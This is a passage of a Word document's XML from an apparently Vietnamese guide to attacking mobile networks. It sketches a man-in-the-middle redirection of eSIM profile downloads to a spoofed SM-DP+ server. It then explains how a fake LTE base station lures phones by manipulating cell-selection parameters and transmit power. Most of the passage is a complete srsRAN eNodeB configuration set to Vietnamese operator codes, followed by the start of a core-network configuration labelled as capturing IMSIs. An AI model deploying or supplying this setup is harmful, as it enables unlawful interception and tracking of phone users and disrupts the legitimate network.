        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SGP.22 (Consumer eSIM) Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">LPA (Local Profile Assistant)    SM-DP+ (Subscription Manager)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">trên thiết bị                    tại nhà mạng</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │                                │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │── ES9+ API (HTTPS) ────────────►│</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │   ProfileDownloadRequest        │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │◄─ ProfilePackage (encrypted) ───│</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │   dùng Profile Protection Key  │</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Vector tấn công</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Tấn công Man-in-the-Middle tại lớp HTTPS trong quá trình Profile Download → chặn và thay thế ActivationCode → redirect sang SM-DP+ giả mạo. Thực tế yêu cầu bypass certificate pinning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="57"/>
    <w:bookmarkEnd w:id="58"/>
    <w:bookmarkStart w:id="63" w:name="fake-enodeb-sdr-based"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Fake eNodeB (SDR-based)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="59" w:name="kiến-trúc-lte-air-interface"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.1 Kiến Trúc LTE Air Interface</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">LTE Protocol Stack (Air Interface – LTE-Uu):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">User Plane:                    Control Plane:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">┌──────────┐                   ┌──────────┐</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   IP     │                   │   NAS    │  ← Non-Access Stratum</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├──────────┤                   ├──────────┤</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  PDCP    │                   │   RRC    │  ← Radio Resource Control</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├──────────┤                   ├──────────┤</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   RLC    │                   │   RLC    │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├──────────┤                   ├──────────┤</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   MAC    │                   │   MAC    │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├──────────┤                   ├──────────┤</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│ PHY (L1) │                   │ PHY (L1) │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">└──────────┘                   └──────────┘</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PHY Layer:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  OFDMA (DL): Subcarrier spacing 15 kHz, cyclic prefix 4.7/16.7 μs</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  SC-FDMA (UL): DFT-spread OFDM</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  Frame: 10ms = 10 subframes = 20 slots = 14 symbols/slot</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  Bandwidth: 1.4/3/5/10/15/20 MHz → 6/15/25/50/75/100 PRBs</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="59"/>
    <w:bookmarkStart w:id="60" w:name="cách-fake-enodeb-thu-hút-ue"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.2 Cách Fake eNodeB Thu Hút UE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cell Selection Criteria (3GPP TS 36.304):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Srxlev = Qrxlevmeas – Qrxlevmin – Qrxlevminoffset &gt; 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Squal  = Qqualmeas  – Qqualmin  – Qqualminoffset &gt; 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Fake eNodeB thao túng:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  - Qrxlevmin = -70 dBm (thấp nhất cho phép → dễ đạt)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  - Phát công suất TX cao → Qrxlevmeas cao</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  → Srxlev của fake cell &gt;&gt; Srxlev của cell thật</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  → UE chọn fake cell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">System Information Broadcast (SIB) quan trọng:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SIB1: Cell identity, MCC, MNC, TAC, cell selection info</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SIB2: Radio resource config, RACH parameters</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SIB3: Cell reselection info</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SIB4/5: Neighbour cell info (có thể dùng để loại bỏ cell thật khỏi neighbor list)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="60"/>
    <w:bookmarkStart w:id="61" w:name="triển-khai-srsran-đầy-đủ"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.3 Triển Khai srsRAN Đầy Đủ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cấu hình enb.conf hoàn chỉnh:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[enb]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">enb_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x19B</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mcc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">452</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mnc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">04</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mme_addr </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 127.0.1.100</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">gtp_bind_addr </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 127.0.1.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">s1c_bind_addr </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 127.0.1.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">n_prb </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">50</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">tm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">nof_ports </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[rf]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">dl_earfcn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1301        # 1805 MHz DL center (Band 3)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">tx_gain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 80            # 0-90 dB</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">rx_gain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">40</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">device_name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> UHD</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">device_args </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> type=b200,clock=internal,otw_format=sc12</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">srate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> -1              # Auto</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">lo_freq_offset_hz </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[scheduler]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pusch_mcs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pdsch_mcs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[expert]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">lte_sample_rates </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">false</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">nof_phy_threads </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">4</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">metrics_period_secs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pregenerate_signals </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">false</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[log]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">all_level </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> warning</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">all_hex_limit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">32</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">filename </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /tmp/srsenb.log</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">file_max_size </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cấu hình epc.conf (giả lập EPC để lấy IMSI):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[mme]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mme_code </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x01</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
